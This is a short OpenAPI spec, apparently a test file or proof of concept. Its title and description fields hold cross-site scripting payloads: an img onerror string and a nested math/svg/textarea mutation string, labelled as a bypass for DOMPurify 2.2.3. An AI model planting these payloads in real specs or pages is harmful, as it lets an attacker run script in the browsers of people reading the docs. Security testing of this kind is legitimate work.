openapi: 3.0.n
info:
  title: AbdulRahman<img src=x onerror=alert(1)>
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: bypass for DomPurify version 2.2.3 
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
